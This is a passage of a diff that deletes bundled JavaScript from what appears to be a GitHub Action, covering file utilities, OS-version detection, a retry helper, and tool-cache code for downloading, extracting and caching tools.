__awaiter(this, void 0, void 0, function* () { - if (ioUtil.IS_WINDOWS) { - // Check for invalid characters - // https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file - if (/[*"<>|]/.test(inputPath)) { - throw new Error('File path must not contain `*`, `"`, `<`, `>` or `|` on Windows'); - } - } - try { - // note if path does not exist, error is silent - yield ioUtil.rm(inputPath, { - force: true, - maxRetries: 3, - recursive: true, - retryDelay: 300 - }); - } - catch (err) { - throw new Error(`File was unable to be removed ${err}`); - } - }); -} -exports.rmRF = rmRF; -/** - * Make a directory. Creates the full path with folders in between - * Will throw if it fails - * - * @param fsPath path to create - * @returns Promise - */ -function mkdirP(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(fsPath, 'a path argument must be provided'); - yield ioUtil.mkdir(fsPath, { recursive: true }); - }); -} -exports.mkdirP = mkdirP; -/** - * Returns path of a tool had the tool actually been invoked. Resolves via paths. - * If you check and the tool does not exist, it will throw. - * - * @param tool name of the tool - * @param check whether to check if tool exists - * @returns Promise path to tool - */ -function which(tool, check) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // recursive when check=true - if (check) { - const result = yield which(tool, false); - if (!result) { - if (ioUtil.IS_WINDOWS) { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also verify the file has a valid extension for an executable file.`); - } - else { - throw new Error(`Unable to locate executable file: ${tool}. Please verify either the file path exists or the file can be found within a directory specified by the PATH environment variable. Also check the file mode to verify the file is executable.`); - } - } - return result; - } - const matches = yield findInPath(tool); - if (matches && matches.length > 0) { - return matches[0]; - } - return ''; - }); -} -exports.which = which; -/** - * Returns a list of all occurrences of the given tool on the system path. - * - * @returns Promise the paths of the tool - */ -function findInPath(tool) { - return __awaiter(this, void 0, void 0, function* () { - if (!tool) { - throw new Error("parameter 'tool' is required"); - } - // build the list of extensions to try - const extensions = []; - if (ioUtil.IS_WINDOWS && process.env['PATHEXT']) { - for (const extension of process.env['PATHEXT'].split(path.delimiter)) { - if (extension) { - extensions.push(extension); - } - } - } - // if it's rooted, return it if exists. otherwise return empty. - if (ioUtil.isRooted(tool)) { - const filePath = yield ioUtil.tryGetExecutablePath(tool, extensions); - if (filePath) { - return [filePath]; - } - return []; - } - // if any path separators, return empty - if (tool.includes(path.sep)) { - return []; - } - // build the list of directories - // - // Note, technically "where" checks the current directory on Windows. From a toolkit perspective, - // it feels like we should not do this. Checking the current directory seems like more of a use - // case of a shell, and the which() function exposed by the toolkit should strive for consistency - // across platforms. - const directories = []; - if (process.env.PATH) { - for (const p of process.env.PATH.split(path.delimiter)) { - if (p) { - directories.push(p); - } - } - } - // find all matches - const matches = []; - for (const directory of directories) { - const filePath = yield ioUtil.tryGetExecutablePath(path.join(directory, tool), extensions); - if (filePath) { - matches.push(filePath); - } - } - return matches; - }); -} -exports.findInPath = findInPath; -function readCopyOptions(options) { - const force = options.force == null ? true : options.force; - const recursive = Boolean(options.recursive); - const copySourceDirectory = options.copySourceDirectory == null - ? true - : Boolean(options.copySourceDirectory); - return { force, recursive, copySourceDirectory }; -} -function cpDirRecursive(sourceDir, destDir, currentDepth, force) { - return __awaiter(this, void 0, void 0, function* () { - // Ensure there is not a run away recursive copy - if (currentDepth >= 255) - return; - currentDepth++; - yield mkdirP(destDir); - const files = yield ioUtil.readdir(sourceDir); - for (const fileName of files) { - const srcFile = `${sourceDir}/${fileName}`; - const destFile = `${destDir}/${fileName}`; - const srcFileStat = yield ioUtil.lstat(srcFile); - if (srcFileStat.isDirectory()) { - // Recurse - yield cpDirRecursive(srcFile, destFile, currentDepth, force); - } - else { - yield copyFile(srcFile, destFile, force); - } - } - // Change the mode for the newly created directory - yield ioUtil.chmod(destDir, (yield ioUtil.stat(sourceDir)).mode); - }); -} -// Buffered file copy -function copyFile(srcFile, destFile, force) { - return __awaiter(this, void 0, void 0, function* () { - if ((yield ioUtil.lstat(srcFile)).isSymbolicLink()) { - // unlink/re-link it - try { - yield ioUtil.lstat(destFile); - yield ioUtil.unlink(destFile); - } - catch (e) { - // Try to override file permission - if (e.code === 'EPERM') { - yield ioUtil.chmod(destFile, '0666'); - yield ioUtil.unlink(destFile); - } - // other errors = it doesn't exist, no work to do - } - // Copy over symlink - const symlinkFull = yield ioUtil.readlink(srcFile); - yield ioUtil.symlink(symlinkFull, destFile, ioUtil.IS_WINDOWS ? 'junction' : null); - } - else if (!(yield ioUtil.exists(destFile)) || force) { - yield ioUtil.copyFile(srcFile, destFile); - } - }); -} -//# sourceMappingURL=io.js.map - -/***/ }), - -/***/ 2473: -/***/ (function(module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports._readLinuxVersionFile = exports._getOsVersion = exports._findMatch = void 0; -const semver = __importStar(__nccwpck_require__(5911)); -const core_1 = __nccwpck_require__(2186); -// needs to be require for core node modules to be mocked -/* eslint @typescript-eslint/no-require-imports: 0 */ -const os = __nccwpck_require__(2037); -const cp = __nccwpck_require__(2081); -const fs = __nccwpck_require__(7147); -function _findMatch(versionSpec, stable, candidates, archFilter) { - return __awaiter(this, void 0, void 0, function* () { - const platFilter = os.platform(); - let result; - let match; - let file; - for (const candidate of candidates) { - const version = candidate.version; - core_1.debug(`check ${version} satisfies ${versionSpec}`); - if (semver.satisfies(version, versionSpec) && - (!stable || candidate.stable === stable)) { - file = candidate.files.find(item => { - core_1.debug(`${item.arch}===${archFilter} && ${item.platform}===${platFilter}`); - let chk = item.arch === archFilter && item.platform === platFilter; - if (chk && item.platform_version) { - const osVersion = module.exports._getOsVersion(); - if (osVersion === item.platform_version) { - chk = true; - } - else { - chk = semver.satisfies(osVersion, item.platform_version); - } - } - return chk; - }); - if (file) { - core_1.debug(`matched ${candidate.version}`); - match = candidate; - break; - } - } - } - if (match && file) { - // clone since we're mutating the file list to be only the file that matches - result = Object.assign({}, match); - result.files = [file]; - } - return result; - }); -} -exports._findMatch = _findMatch; -function _getOsVersion() { - // TODO: add windows and other linux, arm variants - // right now filtering on version is only an ubuntu and macos scenario for tools we build for hosted (python) - const plat = os.platform(); - let version = ''; - if (plat === 'darwin') { - version = cp.execSync('sw_vers -productVersion').toString(); - } - else if (plat === 'linux') { - // lsb_release process not in some containers, readfile - // Run cat /etc/lsb-release - // DISTRIB_ID=Ubuntu - // DISTRIB_RELEASE=18.04 - // DISTRIB_CODENAME=bionic - // DISTRIB_DESCRIPTION="Ubuntu 18.04.4 LTS" - const lsbContents = module.exports._readLinuxVersionFile(); - if (lsbContents) { - const lines = lsbContents.split('\n'); - for (const line of lines) { - const parts = line.split('='); - if (parts.length === 2 && - (parts[0].trim() === 'VERSION_ID' || - parts[0].trim() === 'DISTRIB_RELEASE')) { - version = parts[1] - .trim() - .replace(/^"/, '') - .replace(/"$/, ''); - break; - } - } - } - } - return version; -} -exports._getOsVersion = _getOsVersion; -function _readLinuxVersionFile() { - const lsbReleaseFile = '/etc/lsb-release'; - const osReleaseFile = '/etc/os-release'; - let contents = ''; - if (fs.existsSync(lsbReleaseFile)) { - contents = fs.readFileSync(lsbReleaseFile).toString(); - } - else if (fs.existsSync(osReleaseFile)) { - contents = fs.readFileSync(osReleaseFile).toString(); - } - return contents; -} -exports._readLinuxVersionFile = _readLinuxVersionFile; -//# sourceMappingURL=manifest.js.map - -/***/ }), - -/***/ 8279: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.RetryHelper = void 0; -const core = __importStar(__nccwpck_require__(2186)); -/** - * Internal class for retries - */ -class RetryHelper { - constructor(maxAttempts, minSeconds, maxSeconds) { - if (maxAttempts < 1) { - throw new Error('max attempts should be greater than or equal to 1'); - } - this.maxAttempts = maxAttempts; - this.minSeconds = Math.floor(minSeconds); - this.maxSeconds = Math.floor(maxSeconds); - if (this.minSeconds > this.maxSeconds) { - throw new Error('min seconds should be less than or equal to max seconds'); - } - } - execute(action, isRetryable) { - return __awaiter(this, void 0, void 0, function* () { - let attempt = 1; - while (attempt < this.maxAttempts) { - // Try - try { - return yield action(); - } - catch (err) { - if (isRetryable && !isRetryable(err)) { - throw err; - } - core.info(err.message); - } - // Sleep - const seconds = this.getSleepAmount(); - core.info(`Waiting ${seconds} seconds before trying again`); - yield this.sleep(seconds); - attempt++; - } - // Last attempt - return yield action(); - }); - } - getSleepAmount() { - return (Math.floor(Math.random() * (this.maxSeconds - this.minSeconds + 1)) + - this.minSeconds); - } - sleep(seconds) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise(resolve => setTimeout(resolve, seconds * 1000)); - }); - } -} -exports.RetryHelper = RetryHelper; -//# sourceMappingURL=retry-helper.js.map - -/***/ }), - -/***/ 7784: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.evaluateVersions = exports.isExplicitVersion = exports.findFromManifest = exports.getManifestFromRepo = exports.findAllVersions = exports.find = exports.cacheFile = exports.cacheDir = exports.extractZip = exports.extractXar = exports.extractTar = exports.extract7z = exports.downloadTool = exports.HTTPError = void 0; -const core = __importStar(__nccwpck_require__(2186)); -const io = __importStar(__nccwpck_require__(7436)); -const fs = __importStar(__nccwpck_require__(7147)); -const mm = __importStar(__nccwpck_require__(2473)); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const httpm = __importStar(__nccwpck_require__(6255)); -const semver = __importStar(__nccwpck_require__(5911)); -const stream = __importStar(__nccwpck_require__(2781)); -const util = __importStar(__nccwpck_require__(3837)); -const assert_1 = __nccwpck_require__(9491); -const v4_1 = __importDefault(__nccwpck_require__(7468)); -const exec_1 = __nccwpck_require__(1514); -const retry_helper_1 = __nccwpck_require__(8279); -class HTTPError extends Error { - constructor(httpStatusCode) { - super(`Unexpected HTTP response: ${httpStatusCode}`); - this.httpStatusCode = httpStatusCode; - Object.setPrototypeOf(this, new.target.prototype); - } -} -exports.HTTPError = HTTPError; -const IS_WINDOWS = process.platform === 'win32'; -const IS_MAC = process.platform === 'darwin'; -const userAgent = 'actions/tool-cache'; -/** - * Download a tool from an url and stream it into a file - * - * @param url url of tool to download - * @param dest path to download tool - * @param auth authorization header - * @param headers other headers - * @returns path to downloaded tool - */ -function downloadTool(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - dest = dest || path.join(_getTempDirectory(), v4_1.default()); - yield io.mkdirP(path.dirname(dest)); - core.debug(`Downloading ${url}`); - core.debug(`Destination ${dest}`); - const maxAttempts = 3; - const minSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MIN_SECONDS', 10); - const maxSeconds = _getGlobal('TEST_DOWNLOAD_TOOL_RETRY_MAX_SECONDS', 20); - const retryHelper = new retry_helper_1.RetryHelper(maxAttempts, minSeconds, maxSeconds); - return yield retryHelper.execute(() => __awaiter(this, void 0, void 0, function* () { - return yield downloadToolAttempt(url, dest || '', auth, headers); - }), (err) => { - if (err instanceof HTTPError && err.httpStatusCode) { - // Don't retry anything less than 500, except 408 Request Timeout and 429 Too Many Requests - if (err.httpStatusCode < 500 && - err.httpStatusCode !== 408 && - err.httpStatusCode !== 429) { - return false; - } - } - // Otherwise retry - return true; - }); - }); -} -exports.downloadTool = downloadTool; -function downloadToolAttempt(url, dest, auth, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (fs.existsSync(dest)) { - throw new Error(`Destination file path ${dest} already exists`); - } - // Get the response headers - const http = new httpm.HttpClient(userAgent, [], { - allowRetries: false - }); - if (auth) { - core.debug('set auth'); - if (headers === undefined) { - headers = {}; - } - headers.authorization = auth; - } - const response = yield http.get(url, headers); - if (response.message.statusCode !== 200) { - const err = new HTTPError(response.message.statusCode); - core.debug(`Failed to download from "${url}". Code(${response.message.statusCode}) Message(${response.message.statusMessage})`); - throw err; - } - // Download the response body - const pipeline = util.promisify(stream.pipeline); - const responseMessageFactory = _getGlobal('TEST_DOWNLOAD_TOOL_RESPONSE_MESSAGE_FACTORY', () => response.message); - const readStream = responseMessageFactory(); - let succeeded = false; - try { - yield pipeline(readStream, fs.createWriteStream(dest)); - core.debug('download complete'); - succeeded = true; - return dest; - } - finally { - // Error, delete dest before retry - if (!succeeded) { - core.debug('download failed'); - try { - yield io.rmRF(dest); - } - catch (err) { - core.debug(`Failed to delete '${dest}'. ${err.message}`); - } - } - } - }); -} -/** - * Extract a .7z file - * - * @param file path to the .7z file - * @param dest destination directory. Optional. - * @param _7zPath path to 7zr.exe. Optional, for long path support. Most .7z archives do not have this - * problem. If your .7z archive contains very long paths, you can pass the path to 7zr.exe which will - * gracefully handle long paths. By default 7zdec.exe is used because it is a very small program and is - * bundled with the tool lib. However it does not support long paths. 7zr.exe is the reduced command line - * interface, it is smaller than the full command line interface, and it does support long paths. At the - * time of this writing, it is freely available from the LZMA SDK that is available on the 7zip website. - * Be sure to check the current license agreement. If 7zr.exe is bundled with your action, then the path - * to 7zr.exe can be pass to this function. - * @returns path to the destination directory - */ -function extract7z(file, dest, _7zPath) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_WINDOWS, 'extract7z() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - const originalCwd = process.cwd(); - process.chdir(dest); - if (_7zPath) { - try { - const logLevel = core.isDebug() ? '-bb1' : '-bb0'; - const args = [ - 'x', - logLevel, - '-bd', - '-sccUTF-8', - file - ]; - const options = { - silent: true - }; - yield exec_1.exec(`"${_7zPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - else { - const escapedScript = path - .join(__dirname, '..', 'scripts', 'Invoke-7zdec.ps1') - .replace(/'/g, "''") - .replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const escapedTarget = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const command = `& '${escapedScript}' -Source '${escapedFile}' -Target '${escapedTarget}'`; - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - command - ]; - const options = { - silent: true - }; - try { - const powershellPath = yield io.which('powershell', true); - yield exec_1.exec(`"${powershellPath}"`, args, options); - } - finally { - process.chdir(originalCwd); - } - } - return dest; - }); -} -exports.extract7z = extract7z; -/** - * Extract a compressed tar archive - * - * @param file path to the tar - * @param dest destination directory. Optional. - * @param flags flags for the tar command to use for extraction. Defaults to 'xz' (extracting gzipped tars). Optional. - * @returns path to the destination directory - */ -function extractTar(file, dest, flags = 'xz') { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - // Create dest - dest = yield _createExtractFolder(dest); - // Determine whether GNU tar - core.debug('Checking tar --version'); - let versionOutput = ''; - yield exec_1.exec('tar --version', [], { - ignoreReturnCode: true, - silent: true, - listeners: { - stdout: (data) => (versionOutput += data.toString()), - stderr: (data) => (versionOutput += data.toString()) - } - }); - core.debug(versionOutput.trim()); - const isGnuTar = versionOutput.toUpperCase().includes('GNU TAR'); - // Initialize args - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - if (core.isDebug() && !flags.includes('v')) { - args.push('-v'); - } - let destArg = dest; - let fileArg = file; - if (IS_WINDOWS && isGnuTar) { - args.push('--force-local'); - destArg = dest.replace(/\\/g, '/'); - // Technically only the dest needs to have `/` but for aesthetic consistency - // convert slashes in the file arg too. - fileArg = file.replace(/\\/g, '/'); - } - if (isGnuTar) { - // Suppress warnings when using GNU tar to extract archives created by BSD tar - args.push('--warning=no-unknown-keyword'); - args.push('--overwrite'); - } - args.push('-C', destArg, '-f', fileArg); - yield exec_1.exec(`tar`, args); - return dest; - }); -} -exports.extractTar = extractTar; -/** - * Extract a xar compatible archive - * - * @param file path to the archive - * @param dest destination directory. Optional. - * @param flags flags for the xar. Optional. - * @returns path to the destination directory - */ -function extractXar(file, dest, flags = []) { - return __awaiter(this, void 0, void 0, function* () { - assert_1.ok(IS_MAC, 'extractXar() not supported on current OS'); - assert_1.ok(file, 'parameter "file" is required'); - dest = yield _createExtractFolder(dest); - let args; - if (flags instanceof Array) { - args = flags; - } - else { - args = [flags]; - } - args.push('-x', '-C', dest, '-f', file); - if (core.isDebug()) { - args.push('-v'); - } - const xarPath = yield io.which('xar', true); - yield exec_1.exec(`"${xarPath}"`, _unique(args)); - return dest; - }); -} -exports.extractXar = extractXar; -/** - * Extract a zip - * - * @param file path to the zip - * @param dest destination directory. Optional. - * @returns path to the destination directory - */ -function extractZip(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!file) { - throw new Error("parameter 'file' is required"); - } - dest = yield _createExtractFolder(dest); - if (IS_WINDOWS) { - yield extractZipWin(file, dest); - } - else { - yield extractZipNix(file, dest); - } - return dest; - }); -} -exports.extractZip = extractZip; -function extractZipWin(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - // build the powershell command - const escapedFile = file.replace(/'/g, "''").replace(/"|\n|\r/g, ''); // double-up single quotes, remove double quotes and newlines - const escapedDest = dest.replace(/'/g, "''").replace(/"|\n|\r/g, ''); - const pwshPath = yield io.which('pwsh', false); - //To match the file overwrite behavior on nix systems, we use the overwrite = true flag for ExtractToDirectory - //and the -Force flag for Expand-Archive as a fallback - if (pwshPath) { - //attempt to use pwsh with ExtractToDirectory, if this fails attempt Expand-Archive - const pwshCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.ZipFile } catch { } ;`, - `try { [System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }`, - `catch { if (($_.Exception.GetType().FullName -eq 'System.Management.Automation.MethodException') -or ($_.Exception.GetType().FullName -eq 'System.Management.Automation.RuntimeException') ){ Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force } else { throw $_ } } ;` - ].join(' '); - const args = [ - '-NoLogo', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - pwshCommand - ]; - core.debug(`Using pwsh at path: ${pwshPath}`); - yield exec_1.exec(`"${pwshPath}"`, args); - } - else { - const powershellCommand = [ - `$ErrorActionPreference = 'Stop' ;`, - `try { Add-Type -AssemblyName System.IO.Compression.FileSystem } catch { } ;`, - `if ((Get-Command -Name Expand-Archive -Module Microsoft.PowerShell.Archive -ErrorAction Ignore)) { Expand-Archive -LiteralPath '${escapedFile}' -DestinationPath '${escapedDest}' -Force }`, - `else {[System.IO.Compression.ZipFile]::ExtractToDirectory('${escapedFile}', '${escapedDest}', $true) }` - ].join(' '); - const args = [ - '-NoLogo', - '-Sta', - '-NoProfile', - '-NonInteractive', - '-ExecutionPolicy', - 'Unrestricted', - '-Command', - powershellCommand - ]; - const powershellPath = yield io.which('powershell', true); - core.debug(`Using powershell at path: ${powershellPath}`); - yield exec_1.exec(`"${powershellPath}"`, args); - } - }); -} -function extractZipNix(file, dest) { - return __awaiter(this, void 0, void 0, function* () { - const unzipPath = yield io.which('unzip', true); - const args = [file]; - if (!core.isDebug()) { - args.unshift('-q'); - } - args.unshift('-o'); //overwrite with -o, otherwise a prompt is shown which freezes the run - yield exec_1.exec(`"${unzipPath}"`, args, { cwd: dest }); - }); -} -/** - * Caches a directory and installs it into the tool cacheDir - * - * @param sourceDir the directory to cache into tools - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheDir(sourceDir, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source dir: ${sourceDir}`); - if (!fs.statSync(sourceDir).isDirectory()) { - throw new Error('sourceDir is not a directory'); - } - // Create the tool dir - const destPath = yield _createToolPath(tool, version, arch); - // copy each child item. do not move. move can fail on Windows - // due to anti-virus software having an open handle on a file. - for (const itemName of fs.readdirSync(sourceDir)) { - const s = path.join(sourceDir, itemName); - yield io.cp(s, destPath, { recursive: true }); - } - // write .complete - _completeToolPath(tool, version, arch); - return destPath; - }); -} -exports.cacheDir = cacheDir; -/** - * Caches a downloaded file (GUID) and installs it - * into the tool cache with a given targetName - * - * @param sourceFile the file to cache into tools. Typically a result of downloadTool which is a guid. - * @param targetFile the name of the file name in the tools directory - * @param tool tool name - * @param version version of the tool. semver format - * @param arch architecture of the tool. Optional. Defaults to machine architecture - */ -function cacheFile(sourceFile, targetFile, tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - version = semver.clean(version) || version; - arch = arch || os.arch(); - core.debug(`Caching tool ${tool} ${version} ${arch}`); - core.debug(`source file: ${sourceFile}`); - if (!fs.statSync(sourceFile).isFile()) { - throw new Error('sourceFile is not a file'); - } - // create the tool dir - const destFolder = yield _createToolPath(tool, version, arch); - // copy instead of move. move can fail on Windows due to - // anti-virus software having an open handle on a file. - const destPath = path.join(destFolder, targetFile); - core.debug(`destination file ${destPath}`); - yield io.cp(sourceFile, destPath); - // write .complete - _completeToolPath(tool, version, arch); - return destFolder; - }); -} -exports.cacheFile = cacheFile; -/** - * Finds the path to a tool version in the local installed tool cache - * - * @param toolName name of the tool - * @param versionSpec version of the tool - * @param arch optional arch. defaults to arch of computer - */ -function find(toolName, versionSpec, arch) { - if (!toolName) { - throw new Error('toolName parameter is required'); - } - if (!versionSpec) { - throw new Error('versionSpec parameter is required'); - } - arch = arch || os.arch(); - // attempt to resolve an explicit version - if (!isExplicitVersion(versionSpec)) { - const localVersions = findAllVersions(toolName, arch); - const match = evaluateVersions(localVersions, versionSpec); - versionSpec = match; - } - // check for the explicit version in the cache - let toolPath = ''; - if (versionSpec) { - versionSpec = semver.clean(versionSpec) || ''; - const cachePath = path.join(_getCacheDirectory(), toolName, versionSpec, arch); - core.debug(`checking cache: ${cachePath}`); - if (fs.existsSync(cachePath) && fs.existsSync(`${cachePath}.complete`)) { - core.debug(`Found tool in cache ${toolName} ${versionSpec} ${arch}`); - toolPath = cachePath; - } - else { - core.debug('not found'); - } - } - return toolPath; -} -exports.find = find; -/** - * Finds the paths to all versions of a tool that are installed in the local tool cache - * - * @param toolName name of the tool - * @param arch optional arch. defaults to arch of computer - */ -function findAllVersions(toolName, arch) { - const versions = []; - arch = arch || os.arch(); - const toolPath = path.join(_getCacheDirectory(), toolName); - if (fs.existsSync(toolPath)) { - const children = fs.readdirSync(toolPath); - for (const child of children) { - if (isExplicitVersion(child)) { - const fullPath = path.join(toolPath, child, arch || ''); - if (fs.existsSync(fullPath) && fs.existsSync(`${fullPath}.complete`)) { - versions.push(child); - } - } - } - } - return versions; -} -exports.findAllVersions = findAllVersions; -function getManifestFromRepo(owner, repo, auth, branch = 'master') { - return __awaiter(this, void 0, void 0, function* () { - let releases = []; - const treeUrl = `https://api.github.com/repos/${owner}/${repo}/git/trees/${branch}`; - const http = new httpm.HttpClient('tool-cache'); - const headers = {}; - if (auth) { - core.debug('set auth'); - headers.authorization = auth; - } - const response = yield http.getJson(treeUrl, headers); - if (!response.result) { - return releases; - } - let manifestUrl = ''; - for (const item of response.result.tree) { - if (item.path === 'versions-manifest.json') { - manifestUrl = item.url; - break; - } - } - headers['accept'] = 'application/vnd.github.VERSION.raw'; - let versionsRaw = yield (yield http.get(manifestUrl, headers)).readBody(); - if (versionsRaw) { - // shouldn't be needed but protects against invalid json saved with BOM - versionsRaw = versionsRaw.replace(/^\uFEFF/, ''); - try { - releases = JSON.parse(versionsRaw); - } - catch (_a) { - core.debug('Invalid json'); - } - } - return releases; - }); -} -exports.getManifestFromRepo = getManifestFromRepo; -function findFromManifest(versionSpec, stable, manifest, archFilter = os.arch()) { - return __awaiter(this, void 0, void 0, function* () { - // wrap the internal impl - const match = yield mm._findMatch(versionSpec, stable, manifest, archFilter); - return match; - }); -} -exports.findFromManifest = findFromManifest; -function _createExtractFolder(dest) { - return __awaiter(this, void 0, void 0, function* () { - if (!dest) { - // create a temp dir - dest = path.join(_getTempDirectory(), v4_1.default()); - } - yield io.mkdirP(dest); - return dest; - }); -} -function _createToolPath(tool, version, arch) { - return __awaiter(this, void 0, void 0, function* () { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - core.debug(`destination ${folderPath}`); - const markerPath = `${folderPath}.complete`; - yield io.rmRF(folderPath); - yield io.rmRF(markerPath); - yield io.mkdirP(folderPath); - return folderPath; - }); -} -function _completeToolPath(tool, version, arch) { - const folderPath = path.join(_getCacheDirectory(), tool, semver.clean(version) || version, arch || ''); - const markerPath = `${folderPath}.complete`; - fs.writeFileSync(markerPath, ''); - core.debug('finished caching tool'); -} -/** - * Check if version string is explicit - * - * @param versionSpec version string to check - */ -function isExplicitVersion(versionSpec) { - const c = semver.clean(versionSpec) || ''; - core.debug(`isExplicit: ${c}`); - const valid = semver.valid(c) != null; - core.debug(`explicit? ${valid}`); - return valid; -} -exports.isExplicitVersion = isExplicitVersion; -/** - * Get the highest satisfiying semantic version in `versions` which satisfies `versionSpec` - * - * @param versions array of versions to evaluate - * @param versionSpec semantic version spec to satisfy - */ -function evaluateVersions(versions, versionSpec) { - let version = ''; - core.debug(`evaluating ${versions.length} versions`); - versions = versions.sort((a, b) => { - if (semver.gt(a, b)) { - return 1; - } - return -1; - }); - for (let i = versions.length - 1; i >= 0; i--) { - const potential = versions[i]; - const satisfied = semver.satisfies(potential, versionSpec); - if (satisfied) { - version = potential; - break; - } - } - if (version) { - core.debug(`matched: ${version}`); - } - else { - core.debug('match not found'); - } - return version; -} -exports.evaluateVersions = evaluateVersions; -/** - * Gets RUNNER_TOOL_CACHE - */ -function _getCacheDirectory() { - const cacheDirectory = process.env['RUNNER_TOOL_CACHE'] || ''; - assert_1.ok(cacheDirectory, 'Expected 